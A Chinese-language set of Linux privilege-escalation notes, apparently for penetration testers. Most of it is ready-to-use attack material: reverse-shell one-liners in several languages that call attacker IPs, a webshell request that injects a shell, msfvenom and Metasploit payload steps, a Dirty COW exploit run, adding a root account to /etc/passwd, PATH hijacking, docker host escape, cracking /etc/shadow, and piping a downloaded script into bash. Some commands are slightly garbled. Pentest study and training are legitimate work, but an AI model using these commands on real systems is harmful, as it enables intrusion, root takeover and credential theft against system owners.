linux提权笔记

1 linux提权简介

Linux提权，简单来说，就是用户尝试获取高于其当前权限级别的系统访问权限的过程。在Linux系统中，root用户拥有最高的权限，能够执行任何操作，包括修改系统文件、安装软件、管理用户账户等。而普通用户通常只有有限的权限，不能执行某些系统级别的操作。

提权操作通常出于多种原因，比如进行系统维护、安装软件或调试程序等。然而，如果不当使用或滥用提权操作，也可能导致严重的安全风险，如数据泄露、系统崩溃或被恶意软件利用等。

2 常用命令

uname -a #查看内核/操作系统/cpu信息
hend -n 1 /etc/issue #查看操作系统版本
cat /proc/version #查看系统信息
hostname #查看计算机名
env #查看环境变量
ifconfig #查看网卡
netstat -lntp # 查看所有监听端口
netstat -antp # 查看所有已经建立的连接
netstat -s # 查看网络统计信息
iptables -L #查看防火墙设置
route -n # 查看路由表
ps -ef # 查看所有进程
top # 实时显示进程状态
w # 查看活动用户
id # 查看指定用户信息
last # 查看用户登录日志
cut -d: -f1 /etc/passwd # 查看系统所有用户
cut -d: -f1 /etc/group # 查看系统所有组
crontab -l # 查看当前用户的计划任务
chkconfig –list # 列出所有系统服务
chkconfig –list | grep on # 列出所有启动的系统服务
echo $PATH #查看系统路径

3 反弹shell命令

使用nc对本地端口监听

nc -lvnp 8888

1.bash反弹

bash -i >& /dev/tcp/ip_address/port 0>&1
bash -c "bash -i >& /dev/tcp/192.168.1.52/6666 0>&1"

2.nc反弹

nc -e /bin/sh 192.168.2.130 4444
但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.52 8888 >/tmp/f

3.python

import socket,subprocess,os
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(( "192.168.2.130" , 4444 ))
os.dup2(s.fileno(), 0 )
os.dup2(s.fileno(), 1 )
os.dup2(s.fileno(), 2 )
p = subprocess.call([ "/bin/bash" , "-i" ])

4.php反弹shell

php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

5.ruby反弹shell

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

6.Java反弹shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read
line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

7.xterm反弹shell

xterm -display 10.0.0.1:1

POST /cmd.php HTTP/1.1
Host: 192.168.1.52
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101
Firefox/92.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
cmd=system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.52 8888 >/tmp/f');
cmd=system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.1.52 8888 >/tmp/f');
cmd=system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 192.168.1.52 8888 >/tmp/f');

4 python调用本地shell实现交互式命令行

终端有些时候系统的命令终端不允许直接访问，可以使用python虚拟化一个终端来执行

python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'

5 Linux反弹shell解决乱码

ctrl+z 放置后台任务设置原始格式

stty -echo raw

输入bash命令，再fg调用后台任务

6 LINUX 内核漏洞提权

通常我们在拥有一个webshell的时候，一般权限都是WEB容器权限，如在iis就是iis用户组权限，在apache 就是apache权限，一般都是权限较低，均可执行一些普通命令，如查看当前用户，网络信息，ip信息等。如果我想进行内网渗透就必须将权限提权到最高，如系统权限超级管理员权限。

6.1 内核溢出提权

利用堆栈溢出漏洞，根据当前系统寻找对应的漏洞的exp 使用exp对其进行提权。

uname -a
cat /proc/version
cat /etc/issue
cat /etc/redhat-release
lsb_release -a

根据linux的内核版本去找对应的exp

searchsploit -t Ubuntu 15.04
searchsploit -s Ubuntu 15.04
searchsploit -s Linux Kernel 3.19.0

查看描述

searchsploit -x linux/local/37292.c

复制到桌面上

cp /usr/share/exploitdb/exploits/linux/local/37292.c 37292.c

启动web服务器

python -m http.server 81

wget http://192.168.1.52:81/37292.c
gcc 37292.c -o exp
chmod +x exp
./exp

6.2 脏牛提权 CVE-2016-5195

该漏洞是 Linux 内核的内存子系统在处理写时拷贝（Copy-on-Write）时存在条件竞争漏洞，导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后，利用此漏洞获取其他只读内存映射的写权限，进一步获取 root 权限。

测试环境 ubuntu 14.04

exp下载 GitHub - Brucetg/DirtyCow-EXP: 编译好的脏牛漏洞（CVE-2016-5195）EXP

在靶场上新建普通用户 moon456 密码 123456

下载exp

git clone https://github.com/Brucetg/DirtyCow-EXP.git

启动web服务器

python3 -m http.server 81

下载exp并执行命令

wget http://192.168.1.52:81/dirtycow
chmod +x dirtycow
./dirtycow /etc/group "$(sed '/\(sudo*\)/ s/$/,moon456/' /etc/group)"
su moon456
123456
id
sudo id

7 metasploit linux 提权

1、简介

Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的

缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代

码审计，Web应用程序扫描，社会工程。团队合作，在Metasploit和综合报告提出了他们的发现。

2、使用metasploit linux提权

生成攻击载荷

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.52 LPORT=4444 -f raw >
/var/www/html/msf.php
file_put_contents('m.php',file_get_contents('http://192.168.1.52/msf.php'));

本地监听

use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 192.168.1.52
set lport 4444
exploit

shel.php 的内容

反弹shell

在metasploit设置好监听模块访问shellx.php 就会获取一个session

3、提权命令

getuid 查看当前用户

使用模块查询漏洞

run post/multi/recon/local_exploit_suggester

wget http://192.168.1.52:81/37292.c
gcc 37292.c -o exp
chmod +x exp
./exp
如果成功就会得到一个root

8 suid提权

SUID是赋予文件的一种权限，它会出现在文件拥有者权限的执行位上，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。也就是如果ROOT用户给某个可执行文件加了S权限，那么该执行程序运行的时候将拥有ROOT权限。

以下命令可以发现系统上运行的所有SUID可执行文件

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;

/表示从文件系统的顶部（根）开始并找到每个目录

-perm 表示搜索随后的权限

-u = s表示查找root用户拥有的文件

-type表示我们正在寻找的文件类型

f 表示常规文件，而不是目录或特殊文件

2表示该进程的第二个文件描述符，即stderr（标准错误）

搜索文件进行提取

https://gtfobins.github.io/

find . -exec /bin/sh -p \; -quit
cat /etc/shadow

常见suid提权文件

nmap、vim、find、more、less、bash、cp、Nano、mv、awk、man、weget

9 passwd提权

通过OpenSSL passwd生成一个新的用户hacker，密码为123456

openssl passwd -1 -salt moonhack 123456

$1$moonhack$4o50Z4aoUGaLMC0Rg4Io40

将其追加到的/etc/passwd文件中

将moonhack:$1$moonhack$4o50Z4aoUGaLMC0Rg4Io40:0:0:root:/root:/bin/bash追加到/etc/passwd中

echo 'moonhack:$1$moonhack$4o50Z4aoUGaLMC0Rg4Io40:0:0:root:/root:/bin/bash' >> /etc/passwd

然后切换到moonhack用户即可

10 ssh密钥提权

跳转到.ssh目录奖id_rsa下载到本地设置权限 600 登录

cd .ssh
cat .ssh/id_rsa

vi id_rsa #新建id_rsa
chmod 600 id_rsa #设置权限为600

ssh链接

ssh -i id_rsa web1@192.168.1.24

11.环境劫持提权

环境劫持需要的两个条件存在带有suid的文件 suid文件存在系统命令寻找suid文件

分析文件发现是一个查询进行的命令所以里面应该是用ps命令

ps
/script/shell
xxd /script/shell | grep ps

这个二进制文件运行许的时候一定是调用了ps命令，在/tmp命令下创建ps文件里面使用 /bin/bash执行命令find / -perm -u=s -type f 2>/dev/null当tmp的路径添加到当前环境路径，再访问 /script目录执行shell文件，允许的时候首先会采用/tmp目录的ps文件作为命令

所以可以劫持root命令执行

cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /script
./shell

12.john破解shadow root密文登录提权

利用条件 /etc/shadow 文件可读利用 cat /etc/shadow 打印内容复制到一个文件中使用john进行破解 john会自动检测密文类型 --wordlist 密码字段文件

john --wordlist="/usr/share/wordlists/rockyou.txt" passwd.txt

13.Ubuntu计划任务反弹shell提权

当获取一个linux普通用户的时，查看计划任务

cat /etc/crontab

crontab -l 查看当前用户命令

/var/spool/cron/crontabs/root 这个目录是root任务文件 默认是不是root权限是 看不到

tail -f /var/log/syslog

查看日志文件发现root每一分钟会执行一次 cleanup.py文件

修改内容反弹shell

bash -i >& /dev/tcp/192.168.1.52/6666 0>&1

本地监听 nc -lvnp 6666

14.提权脚本应用

14.1 LinEnum

GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

下载执行

git clone https://github.com/rebootuser/LinEnum.git
wget -O - http://192.168.1.52:81/LinEnum.sh | bash

14.2 linuxprivchecker

https://github.com/sleventyeleven/linuxprivchecker

python3版本

https://github.com/swarley7/linuxprivchecker

wget http://192.168.1.52:81/linuxprivchecker.py
python3 linuxprivchecker.py

14.3 linux-exploit-suggester2

GitHub - jondonas/linux-exploit-suggester-2: Next-Generation Linux Kernel Exploit Suggester

自动检测

wget http://192.168.1.52:81/linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl

15.docker 提权

docker是一个容器可以在同一台机子虚拟多台服务。

输入命令id 和group 查询当前用户信息和组信息发现存在docker组

输入命令下载使用容器把容器的目录挂载到宿主的根目录

docker run -v /:/mnt -it alpine

访问宿主的/etc/shadow

cat /mnt/etc/shadow

16.sudo提权

sudo 是一种权限管理机制，管理员可以授权于一些普通用户去执行一些 root 执行的操作，而不需要知道 root 的密码。

首先通过信息收集，查看是否存在sudo配置不当的可能。如果存在，寻找低权限sudo用户的密码，进而提权。

sudo -l

列出目前用户可执行与无法执行的指令。

可以看到可以使用root特权下的cat命令，所以可以读取任何文件

原理

通常运维会将一些需要 sudo的命令集成到某个用户或者某个组

然后在/etc/sudoers文件内进行设置

首先设置 chmod +w cat /etc/sudoers 使用vi对其编辑保存即可

# User privilege specification
root ALL=(ALL:ALL) ALL
moonsec ALL=(root) NOPASSWD:/bin/cat
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

NOPASSWD 不需要密码使用cat命令并且具有特权权限。